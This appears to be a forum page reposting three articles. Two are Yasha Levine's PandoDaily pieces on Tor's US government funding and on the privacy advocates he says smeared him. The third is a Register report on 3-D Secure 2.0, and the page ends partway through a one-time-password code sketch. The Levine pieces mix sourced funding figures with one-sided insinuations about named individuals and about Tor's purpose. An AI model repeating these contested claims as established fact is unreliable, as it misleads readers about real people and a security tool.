I thought I’d seen it all when an ACLU technology celebrity took to hurling anti-Semitic smears against my reporting. Until last week. That’s when the Los Angeles Review of Books published an article by a computer researcher/privacy activist named Harry Halpin. The article purported to be a review of Julian Assange’s new book, “When Google Met Wikileaks”—but in the middle of his review, Halpin went off on a long-winded tangent attacking me. He called me a conspiracy theorist for reporting on Tor’s government funding, and falsely accused me and PandoDaily of being funded by the CIA:

If Levine is looking for a pot of magical money that has not been touched by the evils of this world, he could always look at his own employer PandoDaily. Levine and PandoDaily are publicly funded by Greylock Partners, who are senior partners with the [sic] In-Q-Tel, the venture capital wing of the CIA. So, the CIA funded Yasha Levine when he exposed that the State Department funded Tor in order to defend CIA agents. The problem with conspiracy theories — including any analysis of conspiracies as networks — is that one immediately runs up against the incommensurable reality of late capitalism: everything is actually connected.

Halpin later admitted that he lied about the CIA-Pando link, saying he did so in order to “prove” a larger point: that investigative journalism that follows the money—like reporting on Tor’s government financing—is nothing but useless conspiracy mongering. Why? Because everything is “connected” so it’s just silly (and a bit crazy) to make a connection between funding and influence. Halpin’s editor added two corrections to the piece, including rewording my alleged CIA link to read “So one could argue that the CIA funded Yasha Levine…” And, yes, one could argue that, assuming one was happy to fabricate facts from whole cloth.

As it turned out, Halpin, like the Tor developers and their defenders, had other reasons to try to discredit reporting on funding and conflicts-of-interest. Halpin is the president of LEAP, a small privacy/encryption outfit that gets most of its funding from various government sources—including more than $1 million from Radio Free Asia’s “Open Technology Fund.” This fund just happens to be a major financial backer of the Tor Network; last year alone, the Open Technology Fund gave Tor $600,000. 
The fund also happens to be run out of the Broadcasting Board of Governors (BBG), an old CIA spinoff dedicated to waging propaganda warfare against regimes hostile to US interests. The BBG—which until recently was called the International Broadcasting Bureau—has also been one of the biggest backers of Tor going back to 2007. So… Halpin attacks me for reporting on Tor’s conflicted government financing—getting money from the very entities Tor purports to protect the public from—while his privacy startup is funded by the same government agency that funds Tor. And in one of the craziest twists, Halpin—who lied about my and Pando’s CIA ties—turns out to be funded by an organization that was founded by the CIA. No “one could argue” about it. It doesn’t get more absurd than this—or more unethical.

When the attacks first started a few months back, I had thought maybe they were driven by a petty defensive reflex: Many were vocal and public supporters of Tor and recommended it to others as an effective tool to protect them from government surveillance. Perhaps the article made them look or feel stupid — after all, no one likes being outed as a sucker. But as the attacks on my article rolled on, month after month, I began to realize there was something more going on, for the oldest reason in the books: self-interest, and money. Most of the privacy activists who attacked my reporting had spent their careers moving through the same tight circle of advocacy groups, think-tanks and nonprofits—all funded by the same small network of government and corporate foundations that fund Tor: Radio Free Asia, State Department, Google, Pierre Omidyar, Ford Foundation. These were people circling the wagons and protecting themselves by smearing critical reporting on Tor’s funding.

Take EFF’s Jillian York. After continuously mocking and playing down concerns about Tor’s funding, York penned an article—”Why we need Tor now more than ever”—that hard-sold Tor as the best and most urgent way for users to protect themselves from government Big Brother surveillance. York made no mention of the government’s ongoing sponsorship of Tor; instead she misrepresented Tor as totally independent since 2006. Without elaborating, she claimed that it “receives funding from a range of sources, including individual donors”:

Initially developed by the U.S. Naval Research Laboratory and DARPA, Tor (which originally stood for “the onion router”) is free software that enables anonymity and censorship circumvention. Since 2006, the Tor Project has operated as a nonprofit organization based out of Massachusetts; it receives funding from a range of sources, including individual donors. Karen Reilly, the Tor Project’s development director, told me that since the organization enabled donations with Bitcoin—the peer-to-peer payment system that allows users to send money anonymously—the organization has seen an uptick in donations, an unsurprising development given their user base.

This is crude sophistry that does a disservice to York’s readers. Sure, Tor might receive funding from a “range of sources,” but the overwhelming majority of Tor’s funding comes from just one: the United States Government, which has continued to provide anywhere from 70 to 100% of Tor’s annual budget since 2007. Jillian York, of all people, should know better. Her employer, EFF, is one of the biggest promoters of Tor. It was also an early financial sponsor, and was instrumental in helping Tor transition from a US Navy project to an “independent” organization back in 2004. 
EFF even shares two corporate funders with Tor: Google and the Omidyar Network. Even more importantly: Jillian York sits on the advisory council of Radio Free Asia’s “Open Technology Fund,” the federal government entity and a major backer of Tor that also funds LARB book reviewer Harry Halpin’s company.

Morgan Marquis-Boire, the First Look Media techie who called me a conspiracy theorist for investigating Tor’s funding, is another prime example. Marquis-Boire is listed as a “special advisor” to EFF; he’s also a longtime researcher at Toronto-based Citizen Lab, a forensic tech outfit backed by Google, Ford Foundation, George Soros’ Open Society Institute, Palantir and Canada’s version of USAID. Citizen Lab is also a close partner of Radio Free Asia’s “Open Technology Fund.” Before taking his current job with Omidyar, he was on Google’s payroll.

Then there’s ACLU’s Christopher Soghoian, who compared my Tor reporting to deadly anti-Semitic propaganda. Soghoian has been dubbed the “Ralph Nader for the Internet Age” by Wired, but it’s a curious analogy. Nader’s fame came from fighting corporate power and greed; but Soghoian has spent his entire career sucking from the corporate teat, indiscriminately moving from one oligarch’s foundation to another: graduate school scholarship from Google in 2006/2007; the Koch brothers’ Institute for Humane Studies, chaired by Charles Koch himself, in 2008/2009; fellowship at Harvard’s Berkman Center for Internet & Society, an outfit funded by the State Department, USAID, Soros, Google, Omidyar, and so on; Soros Open Society fellowship in 2011/2012; TEDGlobal Fellow in 2012, funded in part by Amazon billionaire Jeff Bezos; and most recently, a fellowship at Yale Law School’s Information Society Project, which is funded by Google, Ford Foundation, Soros, Microsoft and many, many more.

Not surprisingly, Soghoian’s policy work on privacy and encryption argues that markets are the solution to online privacy and surveillance problems, not laws, regulations or politics. In a recent paper published in the Harvard Journal of Law and Technology—which was co-authored with a former-prosecutor-turned-lobbyist—Soghoian argued that encryption technology, not regulations, was the only thing that could effectively protect Americans from surveillance: “communications of Americans will only be secured through the use of privacy enhancing technologies like encryption, not with regulations prohibiting the use or sale of interception technology.”

No wonder all these people are so upset by my reporting. They’ve branded themselves as radical activists fighting The Man and the corporate surveillance apparatus—while taking money from the US government’s military and foreign policy arms, as well as the biggest and worst corporate violators of our privacy. By branding themselves as radical activists, they appear to share the same interests as the grassroots they seek to influence; exposing their funding conflicts of interest makes it hard for them to pose as grassroots radicals. So instead of explaining why getting funding from the very entities that Tor is supposed to protect users from is not a problem, they’ve taken the low road to discredit the very idea of reporting on monetary conflicts of interest as either irrelevant, or worse, a sign of mental illness.

Who would’ve thought that many of the people we’ve entrusted with protecting our online privacy have the same values as sleazy K Street lobbyists. 
Sursa: How leading Tor developers and advocates tried to smear me after I reported their US Government ties | PandoDaily
  10. Almost everyone involved in developing Tor was (or is) funded by the US government

By Yasha Levine On July 16, 2014

“The United States government can’t simply run an anonymity system for everybody and then use it themselves only. Because then every time a connection came from it people would say, ‘Oh, it’s another CIA agent.’ If those are the only people using the network.” —Roger Dingledine, co-founder of the Tor Network, 2004

***

In early July, hacker Jacob Appelbaum and two other security experts published a blockbuster story in conjunction with the German press. They had obtained leaked top secret NSA documents and source code showing that the surveillance agency had targeted and potentially penetrated the Tor Network, a widely used privacy tool considered to be the holy grail of online anonymity. Internet privacy activists and organizations reacted to the news with shock. For the past decade, they had been promoting Tor as a scrappy but extremely effective grassroots technology that can protect journalists, dissidents and whistleblowers from powerful government forces that want to track their every move online. It was supposed to be the best tool out there. Tor’s been an integral part of EFF’s “Surveillance Self-Defense” privacy toolkit. Edward Snowden is apparently a big fan, and so is Glenn Greenwald, who says it “allows people to surf without governments or secret services being able to monitor them.” But the German exposé showed Tor providing the opposite of anonymity: it singled out users for total NSA surveillance, potentially sucking up and recording everything they did online.

To many in the privacy community, the NSA’s attack on Tor was tantamount to high treason: a fascist violation of a fundamental and sacred human right to privacy and free speech. The Electronic Frontier Foundation believes Tor to be “essential to freedom of expression.” Appelbaum — a Wikileaks volunteer and Tor developer — considers volunteering for Tor to be a valiant act on par with “going to Spain to fight the Franco fascists” on the side of anarchist revolutionaries. It’s a nice story, pitting scrappy techno-anarchists against the all-powerful US Imperial machine. But the facts about Tor are not as clear cut or simple as these folks make them out to be…

Let’s start with the basics: Tor was developed, built and financed by the US military-surveillance complex. Tor’s original — and current — purpose is to cloak the online identity of government agents and informants while they are in the field: gathering intelligence, setting up sting operations, giving human intelligence assets a way to report back to their handlers — that kind of thing. This information is out there, but it’s not very well known, and it’s certainly not emphasized by those who promote it. Peek under Tor’s hood, and you quickly realize that just about everybody involved in developing Tor technology has been and/or still is funded by the Pentagon or a related arm of the US empire. That includes Roger Dingledine, who brought the technology to life under a series of military and federal government contracts. Dingledine even spent a summer working at the NSA. If you read the fine print on Tor’s website, you’ll see that Tor is still very much in active use by the US government: “A branch of the U.S. Navy uses Tor for open source intelligence gathering, and one of its teams used Tor while deployed in the Middle East recently. 
Law enforcement uses Tor for visiting or surveilling web sites without leaving government IP addresses in their web logs, and for security during sting operations.”

NSA? DoD? U.S. Navy? Police surveillance? What the hell is going on? How is it possible that a privacy tool was created by the same military and intelligence agencies that it’s supposed to guard us against? Is it a ruse? A sham? A honeytrap? Maybe I’m just being too paranoid… Unfortunately, this is not a tinfoil hat conspiracy theory. It is cold hard fact.

Brief history of Tor

The origins of Tor go back to 1995, when military scientists at the Naval Research Laboratory began developing cloaking technology that would prevent someone’s activity on the Internet from being traced back to them. They called it “onion routing” — a method of redirecting traffic into a parallel peer-to-peer network and bouncing it around randomly before sending it off to its final destination. The idea was to move it around so as to confuse and disconnect its origin and destination, and make it impossible for someone to observe who you are or where you’re going on the Internet. Onion routing was like a hustler playing three-card monte with your traffic: the guy trying to spy on you could watch it going under one card, but he never knew where it would come out.

The technology was funded by the Office of Naval Research and DARPA. Early development was spearheaded by Paul Syverson, Michael Reed and David Goldschlag — all military mathematicians and computer systems researchers working for the Naval Research Laboratory, sitting inside the massive Joint Base Anacostia-Bolling military base in Southeast Washington, D.C. The original goal of onion routing wasn’t to protect privacy — or at least not in the way most people think of “privacy.” The goal was to allow intelligence and military personnel to work online undercover without fear of being unmasked by someone monitoring their Internet activity. “As military grade communication devices increasingly depend on the public communications infrastructure, it is important to use that infrastructure in ways that are resistant to traffic analysis. It may also be useful to communicate anonymously, for example when gathering intelligence from public databases,” explained a 1997 paper outlining an early version of onion routing that was published in the Naval Research Labs Review.

In the ’90s, as public Internet use and infrastructure grew and multiplied, spooks needed to figure out a way to hide their identity in plain sight online. An undercover spook sitting in a hotel room in a hostile country somewhere couldn’t simply dial up CIA.gov on his browser and log in — anyone sniffing his connection would know who he was. Nor could a military intel agent infiltrate a potential terrorist group masquerading as an online animal rights forum if he had to create an account and log in from an army base IP address. That’s where onion routing came in. As Michael Reed, one of the inventors of onion routing, explained: providing cover for military and intelligence operations online was their primary objective; everything else was secondary:

The original *QUESTION* posed that led to the invention of Onion Routing was, “Can we build a system that allows for bi-directional communications over the Internet where the source and destination cannot be determined by a mid-point?” The *PURPOSE* was for DoD / Intelligence usage (open source intelligence gathering, covering of forward deployed assets, whatever). 
Not helping dissidents in repressive countries. Not assisting criminals in covering their electronic tracks. Not helping bit-torrent users avoid MPAA/RIAA prosecution. Not giving a 10 year old a way to bypass an anti-porn filter. Of course, we knew those would be other unavoidable uses for the technology, but that was immaterial to the problem at hand we were trying to solve (and if those uses were going to give us more cover traffic to better hide what we wanted to use the network for, all the better…I once told a flag officer that much to his chagrin).

Apparently solving this problem wasn’t very easy. Onion router research progressed slowly, with several versions developed and discarded. But in 2002, seven years after it began, the project moved into a different and more active phase. Paul Syverson from the Naval Research Laboratory stayed on the project, but two new guys fresh outta MIT grad school came on board: Roger Dingledine and Nick Mathewson. They were not formally employed by Naval Labs, but were on contract from DARPA and the U.S. Naval Research Laboratory’s Center for High Assurance Computer Systems. For the next several years, the three of them worked on a newer version of onion routing that would later become known as Tor.

Very early on, researchers understood that just designing a system that only technically anonymizes traffic is not enough — not if the system is used exclusively by military and intelligence. In order to cloak spooks better, Tor needed to be used by a diverse group of people: activists, students, corporate researchers, soccer moms, journalists, drug dealers, hackers, child pornographers, foreign agents, terrorists — the more diverse the group, the easier it would be for spooks to hide in the crowd in plain sight. Tor also needed to be moved off site and disassociated from Naval research. As Syverson told Bloomberg in January 2014: “If you have a system that’s only a Navy system, anything popping out of it is obviously from the Navy. You need to have a network that carries traffic for other people as well.” Dingledine said the same thing a decade earlier at the 2004 Wizards of OS conference in Germany: “The United States government can’t simply run an anonymity system for everybody and then use it themselves only. Because then every time a connection came from it people would say, ‘Oh, it’s another CIA agent.’ If those are the only people using the network.”

The consumer version of Tor would be marketed to everyone and — equally important — would eventually allow anyone to run a Tor node/relay, even from their desktop computer. The idea was to create a massive crowdsourced torrent-style network made up of thousands of volunteers all across the world. At the very end of 2004, with Tor technology finally ready for deployment, the US Navy cut most of its Tor funding, released it under an open source license and, oddly, the project was handed over to the Electronic Frontier Foundation. “We funded Roger Dingledine and Nick Mathewson to work on Tor for a single year from November 2004 through October 2005 for $180,000. We then served as a fiscal sponsor for the project until they got their 501(c)(3) status over the next year or two. During that time, we took in less than $50,000 for the project,” EFF’s Dave Maass told me by email. In a December 2004 press release announcing its support for Tor, EFF curiously failed to mention that this anonymity tool was developed primarily for military and intelligence use. 
Instead, it focused purely on Tor’s ability to protect free speech from oppressive regimes in the Internet age. “The Tor project is a perfect fit for EFF, because one of our primary goals is to protect the privacy and anonymity of Internet users. Tor can help people exercise their First Amendment right to free, anonymous speech online,” said EFF’s Technology Manager Chris Palmer. Later on, EFF’s online materials began mentioning that Tor had been developed by the Naval Research Lab, but played down the connection, explaining that it was “in the past.” Meanwhile the organization kept boosting and promoting Tor as a powerful privacy tool: “Your traffic is safer when you use Tor.”

Playing down Tor’s ties to the military…

The people at EFF weren’t the only ones minimizing Tor’s ties to the military. In 2005, Wired published what might have been the first major profile of Tor technology. The article was written by Kim Zetter, and headlined: “Tor Torches Online Tracking.” Although Zetter was a bit critical of Tor, she made it seem like the anonymity technology had been handed over by the military with no strings attached to “two Boston-based programmers” — Dingledine and Nick Mathewson, who had completely rebuilt the product and ran it independently. Dingledine and Mathewson might have been based in Boston, but they — and Tor — were hardly independent. At the time that the Wired article went to press in 2005, both had been on the Pentagon payroll for at least three years. And they would continue to be on the federal government’s payroll for at least another seven years. In fact, in 2004, at the Wizards of OS conference in Germany, Dingledine proudly announced that he was building spycraft tech on the government payroll: “I forgot to mention earlier something that will make you look at me in a new light. I contract for the United States Government to build anonymity technology for them and deploy it. They don’t think of it as anonymity technology, although we use that term. They think of it as security technology. They need these technologies so they can research people they are interested in, so they can have anonymous tip lines, so that they can buy things from people without other countries knowing what they are buying, how much they are buying and where it is going, that sort of thing.”

Government support kept rolling in well after that. In 2006, Tor research was funded through a no-bid federal contract awarded to Dingledine’s consulting company, Moria Labs. And starting in 2007, the Pentagon cash came directly through the Tor Project itself — thanks to the fact that Team Tor finally left EFF and registered its own independent 501(c)(3) non-profit. How dependent was — and is — Tor on support from federal government agencies like the Pentagon? In 2007, it appears that all of Tor’s funding came from the federal government via two grants. A quarter million came from the International Broadcasting Bureau (IBB), a CIA spinoff that now operates under the Broadcasting Board of Governors. IBB runs Voice of America and Radio Marti, a propaganda outfit aimed at subverting Cuba’s communist regime. The CIA supposedly cut IBB financing in the 1970s after its ties to Cold War propaganda arms like Radio Free Europe were exposed. The second chunk of cash — just under $100,000 — came from Internews, an NGO aimed at funding and training dissidents and activists abroad. Tor’s subsequent tax filings show that grants from Internews were in fact conduits for “pass through” grants from the US State Department. 
In 2008, Tor got $527,000 again from IBB and Internews, which meant that 90% of its funding came from U.S. government sources that year.

In 2009, the federal government provided just over $900,000, or about 90% of the funding. Part of that cash came through a $632,189 federal grant from the State Department, described in tax filings as a "Pass-Through from Internews Network International." Another $270,000 came via the CIA-spinoff IBB. The Swedish government gave $38,000, while Google gave a minuscule $29,000. Most of that government cash went out in the form of salaries to Tor administrators and developers. Tor co-founders Dingledine and Mathewson made $120,000. Jacob Appelbaum, the rock star hacker, Wikileaks volunteer and Tor developer, made $96,000.

In 2010, the State Department upped its grant to $913,000 and IBB gave $180,000 — which added up to nearly $1 million out of a total of $1.3 million total funds listed on tax filings that year. Again, a good chunk of that went out as salaries to Tor developers and managers.

In 2011, IBB gave $150,000, while another $730,000 came via Pentagon and State Department grants, which represented more than 70% of the grants that year. (Although based on tax filings, government contracts added up to nearly 100% of Tor's funding.) The DoD grant was passed through the Stanford Research Institute, a cutting-edge Cold War military-intel outfit. The Pentagon-SRI grant to Tor was given this description: "Basic and Applied Research and Development in Areas Relating to the Navy Command, Control, Communications, Computers, Intelligence, Surveillance, and Reconnaissance." That year, a new government funder came on the scene: the Swedish International Development Cooperation Agency (SIDA), Sweden's version of USAID, gave Tor $279,000.

In 2012, Tor nearly doubled its budget, taking in $2.2 million from Pentagon and intel-connected grants: $876,099 came from the DoD, $353,000 from the State Department, $387,800 from IBB. That same year, Tor lined up an unknown amount of funding from the Broadcasting Board of Governors to finance fast exit nodes.

Tor at the NSA?

In 2013, the Washington Post revealed that the NSA had figured out various ways of unmasking and penetrating the anonymity of the Tor Network. Since 2006, according to a 49-page research paper titled simply "Tor," the agency has worked on several methods that, if successful, would allow the NSA to uncloak anonymous traffic on a "wide scale" — effectively by watching communications as they enter and exit the Tor system, rather than trying to follow them inside. One type of attack, for example, would identify users by minute differences in the clock times on their computers.

The evidence came out of Edward Snowden's NSA leaks. It appeared that the surveillance agency had developed several techniques to get at Tor. One of the documents explained that one of these techniques was "pretty much guaranteed to succeed."

Snowden's leaks revealed another interesting detail: In 2007, Dingledine gave a talk at the NSA's HQ explaining Tor, and how it worked. The Washington Post published the NSA's notes from their meeting with Dingledine. They showed that Dingledine and the NSA mostly talked about the technical details of Tor — how the network works and some of its security/usability tradeoffs. The NSA was curious about "Tor's customers," and Dingledine ran down some of the types of people who could benefit from Tor:
Blogger Alice, 8-year-old Alice, Sick Alice, Consumer Alice, Oppressed Alice, Business Alice, Law Enforcement Alice…

Interestingly, Dingledine told the NSA that "the way TOR is spun is dependent on who the 'spinee' is" — meaning that he markets Tor technology in different ways to different people? The Washington Post article described Dingledine's trip to the NSA as "a wary encounter, akin to mutual intelligence gathering, between a spy agency and a man who built tools to ward off electronic surveillance." Dingledine told the paper that he came away from that meeting with the feeling that the NSA was trying to hack the Tor network: "As he spoke to the NSA, Dingledine said in an interview Friday, he suspected the agency was attempting to break into Tor, which is used by millions of people around the world to shield their identities."

Dingledine may very well have been antagonistic during his meeting with the NSA. Perhaps he was protective of his Tor baby, and didn't want its original inventors and sponsors in the US government taking it back. But whatever the reason, the antagonism was not likely borne out of some sort of innate ideological hostility towards the US national security state. Aside from being on the DoD payroll, Dingledine spends a considerable amount of his time meeting and consulting with military, intelligence and law enforcement agencies to explain why Tor's so great, and instructing them on how to use it. What kind of agencies does he meet with? The FBI, CIA and DOJ are just a few… And if you listen to Dingledine explain these encounters in some of his public appearances, one does not detect so much as a whiff of antagonism towards intelligence and law enforcement agencies.

In 2013, during a talk at UC San Diego, Dingledine cheerfully recalled how an exuberant FBI agent rushed up to thank him during his recent trip to the FBI: "So I've been doing a lot of talks lately for law enforcement. And pretty much every talk I do these days, some FBI person comes up to me afterwards and says, 'I use Tor every day for my job. Thank you.' Another example is anonymous tips — I was talking to the folks who run the CIA anonymous tip line. It's called the Iraqi Rewards Program…"

Dingledine's close collaboration with law enforcement aside, there's the strangely glib manner in which he dismissed news about the NSA hacking into Tor. He seemed totally unconcerned by the evidence revealed by Snowden's leaks, and played down the NSA's capabilities in his comments to the Washington Post: "If those documents actually represent what they can do, they are not as big an adversary as I thought." I reached out to Dingledine to ask him about his trip to the NSA and whether he warned the Tor community back in 2007 that he suspected the NSA was targeting Tor users. He didn't respond.

How safe is Tor, really?

If Dingledine didn't appear to be fazed by evidence of the NSA's attack on Tor anonymity, it's strange, considering that an attack by a powerful government entity has been known to be one of Tor's principal weaknesses for quite some time. In a 2011 discussion on Tor's official listserv, Tor developer Mike Perry admitted that Tor might not be very effective against powerful, organized "adversaries" (aka governments) that are capable of monitoring huge swaths of the Internet. "Extremely well funded adversaries that are able to observe large portions of the Internet can probably break aspects of Tor and may be able to deanonymize users.
This is why the core tor program currently has a version number of 0.2.x and comes with a warning that it is not to be used for "strong anonymity". (Though I personally don't believe any adversary can reliably deanonymize *all* tor users . . . but attacks on anonymity are subtle and cumulative in nature).

Indeed, just last year, Syverson was part of a research team that pretty much proved that Tor can no longer be expected to protect users over the long term. "Tor is known to be insecure against an adversary that can observe a user's traffic entering and exiting the anonymity network. Quite simple and efficient techniques can correlate traffic at these separate locations by taking advantage of identifying traffic patterns. As a result, the user and his destination may be identified, completely subverting the protocol's security goals." The researchers concluded: "These results are somewhat gloomy for the current security of the Tor network." While Syverson indicated that some of the security issues identified by this research have been addressed in recent Tor versions, the findings only added to a growing list of other research and anecdotal evidence showing Tor's not as safe as its boosters want you to think — especially when pitted against determined intelligence agencies.

Case in point: In December 2013, a panicked 20-year-old Harvard overachiever named Eldo Kim learned just how little protection Tor offered would-be terrorists. To avoid taking a final exam he wasn't prepared for, Kim hit upon the idea of sending in a fake bomb threat. To cover his tracks, he used Tor, supposedly the best anonymity service the web had to offer. But it did little to mask his identity from a determined Uncle Sam. A joint investigation, which involved the FBI, the Secret Service and local police, was able to track the fake bomb threat right back to Kim — in less than 24 hours. As the FBI complaint explained, "Harvard University was able to determine that, in the several hours leading up to the receipt of the e-mail messages described above, ELDO KIM accessed TOR using Harvard's wireless network." All that Tor did was make the cops jump a few extra steps. But it wasn't hard, nothing that a bit of manpower with full legal authority to access network records couldn't solve. It helped that Harvard's network was logging all metadata access on the network — sorta like the NSA.

Over the past few years, U.S. law enforcement has taken control of and shut down a series of illegal child porn and drug marketplaces operating on what should have been untraceable, hyper-anonymous servers running in the Tor cloud. In 2013, they took down Freedom Hosting, which was accused of being a massive child porn hosting operation — but not before taking control of its servers and intercepting all of its communication with customers. The FBI did the same thing that same year with the online drug superstore Silk Road, which also ran its services in the Tor cloud. Although rookie mistakes helped the FBI unmask the identity of Dread Pirate Roberts, it is still a mystery how they were able to totally take over and control, and even copy, a server run in the Tor cloud — something that is supposed to be impossible.

Back in 2007, a Swedish hacker/researcher named Dan Egerstad showed that just by running a Tor node, he could siphon and read all the unencrypted traffic that went through his chunk of the Tor network. He was able to access logins and passwords to accounts of NGOs, companies, and the embassies of India and Iran.
Egerstad thought at first that embassy staff were just being careless with their info, but quickly realized that he had actually stumbled on a hack/surveillance operation in which Tor was being used to covertly access these accounts. Although Egerstad was a big fan of Tor and still believes that Tor can provide anonymity if used correctly, the experience made him highly suspicious. He told the Sydney Morning Herald that he thinks many of the major Tor nodes are being run by intelligence agencies or other parties interested in listening in on Tor communication: "I don't like speculating about it, but I'm telling people that it is possible. And if you actually look into where these Tor nodes are hosted and how big they are, some of these nodes cost thousands of dollars each month just to host because they're using lots of bandwidth, they're heavy-duty servers and so on. Who would pay for this and be anonymous? For example, five of six of them are in Washington D.C.…"

Tor stinks?

Tor supporters point to a cache of NSA documents leaked by Snowden to prove that the agency fears and hates Tor. A 2013 Guardian story based on these docs — written by James Ball, Bruce Schneier and Glenn Greenwald — argues that the agency is all but powerless against the anonymity tool.

…the documents suggest that the fundamental security of the Tor service remains intact. One top-secret presentation, titled 'Tor Stinks', states: "We will never be able to de-anonymize all Tor users all the time." It continues: "With manual analysis we can de-anonymize a very small fraction of Tor users," and says the agency has had "no success de-anonymizing a user in response" to a specific request. Another top-secret presentation calls Tor "the king of high-secure, low-latency internet anonymity".

But the NSA docs are far from conclusive and offer conflicting bits of evidence, allowing for multiple interpretations. The fact is that the NSA and GCHQ clearly have the capability to compromise Tor; it might just take a bit of targeted effort. One thing is clear: the NSA most certainly does not hate or fear Tor. And some aspects of Tor are definitely welcomed by the NSA, in part because it helps concentrate potential "targets" in one convenient location. From the "Tor Stinks" slides:

Tor Stinks… But it Could be Worse
• Critical mass of targets use Tor. Scaring them away might be counterproductive.
• We can increase our success rate and provide more client IPs for individual Tor users.
• We will never get 100% but we don't need to provide true IPs for every target every time they use Tor.

The Tor network is not as difficult to capture as it may seem…

In 2012, Tor co-founder Roger Dingledine revealed that the Tor Network is configured to prioritize speed and route traffic through the fastest servers/nodes available. As a result, the vast bulk of Tor traffic runs through several dozen of the fastest and most dependable servers: "on today's network, clients choose one of the fastest 5 exit relays around 25-30% of the time, and 80% of their choices come from a pool of 40-50 relays." Dingledine was criticized by the Tor community for the obvious reason that funneling traffic through a handful of fast nodes made surveilling and subverting Tor much easier. Anyone can run a Tor node — a research student in Germany, a guy with a FiOS connection in Victorville (which is what I did for a few months), an NSA front out of Hawaii or a guy working for China's Internet Police.
There’s no way of knowing if the people running the fastest most stable nodes are doing it out of goodwill or because it’s the best way to listen in and subvert the Tor network. Particularly troubling was that Snowden’s leaks clearly showed the NSA and GCHQ run Tor nodes, and are interested in running more. And running 50 Tor nodes doesn’t seem like it would be too difficult for any of the world’s intelligence agencies — whether American, German, British, Russian, Chinese or Iranian. Hell, if you’re an intelligence agency, there’s no reason not to run a Tor node. Back in 2005, Dingledine admitted to Wired that this was a “tricky design question” but couldn’t provide a good answer to how they’d handle it. In 2012, he dismissed his critics altogether, explaining that he was perfectly willing to sacrifice security for speed — whatever it took to take get more people to use Tor: This choice goes back to the original discussion that Mike Perry and I were wrestling with a few years ago… if we want to end up with a fast safe network, do we get there by having a slow safe network and hoping it’ll get faster, or by having a fast less-safe network and hoping it’ll get safer? We opted for the “if we don’t stay relevant to the world, Tor will never grow enough” route. Speaking of spooks running Tor nodes… If you thought the Tor story couldn’t get any weirder, it can and does. Probably the strangest part of this whole saga is the fact that Edward Snowden ran multiple high-bandwidth Tor nodes while working as an NSA contractor in Hawaii. This only became publicly known last May, when Tor developer Runa Sandvik (who also drew her salary from Pentagon/State Department sources at Tor) told Wired’s Kevin Poulsen that just two weeks before he would try to get in touch with Glenn Greenwald, Snowden emailed her, explaining that he ran a major Tor node and wanted to get some Tor stickers. Stickers? Yes, stickers. Here’s Wired: In his e-mail, Snowden wrote that he personally ran one of the “major tor exits”–a 2 gbps server named “TheSignal”–and was trying to persuade some unnamed coworkers at his office to set up additional servers. He didn’t say where he worked. But he wanted to know if Sandvik could send him a stack of official Tor stickers. (In some post-leak photos of Snowden you can see the Tor sticker on the back of his laptop, next to the EFF sticker). Snowden’s request for Tor stickers turned into something a bit more intimate. Turned out that Sandvik was already planning to go to Hawaii for vacation, so she suggested they meet up to talk about communication security and encryption. She wrote Snowden back and offered to give a presentation about Tor to a local audience. Snowden was enthusiastic and offered to set up a crypto party for the occasion. So the two of them threw a “crypto party” at a local coffee shop in Honolulu, teaching twenty or so locals how to use Tor and encrypt their hard drives. “He introduced himself as Ed. We talked for a bit before everything started. And I remember asking where he worked or what he did, and he didn’t really want to tell,” Sandvik told Wired. But she did learn that Snowden was running more than one Tor exit node, and that he was trying to get some of his buddies at “work”to set up additional Tor nodes… H’mmm….So Snowden running powerful Tor nodes and trying to get his NSA colleagues to run them, too? I reached out to Sandvik for comment. She didn’t reply. 
But Wired’s Poulsen suggested that running Tor nodes and throwing a crypto party was a pet privacy project for Snowden. “Even as he was thinking globally, he was acting locally.” But it’s hard to imagine a guy with top secret security clearance in the midst of planning to steal a huge cache of secrets would risk running a Tor node to help out the privacy cause. But then, who hell knows what any of this means. I guess it’s fitting that Tor’s logo is an onion — because the more layers you peel and the deeper you get, the less things make sense and the more you realize that there is no end or bottom to it. It’s hard to get any straight answers — or even know what questions you should be asking. In that way, the Tor Project more resembles a spook project than a tool designed by a culture that values accountability or transparency. Sursa: Almost everyone involved in developing Tor was (or is) funded by the US government | PandoDaily
  11. Mastercard and Visa to ERADICATE password authentication By John Leyden, 14 Nov 2014 Mastercard and Visa are removing the need for users to enter their passwords for identity confirmation as part of a revamp of the existing (oft-criticised) 3-D Secure scheme. The arrival of 3D Secure 2.0 next year will see the credit card giants moving away from the existing system of secondary static passwords to authorise online purchases, as applied by Verified by Visa and MasterCard SecureCode, towards a next-gen system based on more secure biometric and token-based prompts. Security experts welcomed the move, which some argue is if anything overdue. Initially authentication codes will be sent to pre-registered mobiles before the longer term goal of placing more emphasis on biometrics. “All of us want a payment experience that is safe as well as simple, not one or the other,” said Ajay Bhalla, president of enterprise security solutions at MasterCard, The Guardian reports. “We want to identify people for who they are, not what they remember. We have too many passwords to remember and this creates extra problems for consumers and businesses.” 3-D Secure is disliked both by security experts, who argue it's easily circumvented by phishing attacks, and merchants, who say the scheme's only benefit is allowing banks to shift liability in the case of fraudulent payments. The long-standing criticism has been that schemes like Verified by Visa inconvenience users without offering increased security. Marta Janus, a security researcher at Kaspersky Lab, welcomed the decision by the credit card giants to move away from static passwords. "It’s pretty well known that passwords are severely flawed: weak ones are easy to remember and easy to guess; strong ones are hard to guess, but hard to remember," Janus said. "So the move from Mastercard and Visa is definitely an interesting one." "It’s a really good approach and, if implemented properly, the new protocol will not only be way more convenient for users, but also much more secure. One time passwords are already widely used and considered much safer than traditional 'fixed' passwords, even if it's still possible for cybercriminals to obtain and use them. But, combined with biometric checks, this will certainly make a strong alternative to any existing authentication method," she concluded. Phil Turner, VP EMEA at enterprise-focused identity management service firm Okta, also welcomed the development as a move towards reducing the number of usernames/passwords consumers are obliged to remember. "Between their work and personal accounts, consumers have a lot of usernames and passwords to remember, each of which has different password requirements and expiration cycles," Turner explained. "Add this to the hassle caused by constant password resets and remembering secret questions and it’s clear consumers need a way to make this process easier. "The move to abolish passwords will no doubt be welcomed by customers. Today we have so many passwords to remember. As a result, most of us suffer from 'password fatigue' where we use obvious or reused passwords often written down on Post-it notes or saved in Excel files on laptops," he added. ® Sursa: Mastercard and Visa to ERADICATE password authentication • The Register
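The article doesn't specify how 3D Secure 2.0 will generate its one-time codes, but for a concrete picture of how token-based one-time passwords work in general, here is a minimal sketch of the standard TOTP scheme (RFC 6238) in Python 3; the base32 secret is a made-up example and has nothing to do with Visa's or MasterCard's actual protocol:

import base64
import hashlib
import hmac
import struct
import time

def totp(secret_b32, period=30, digits=6):
    # HMAC-SHA1 over the current 30-second time counter, per RFC 6238.
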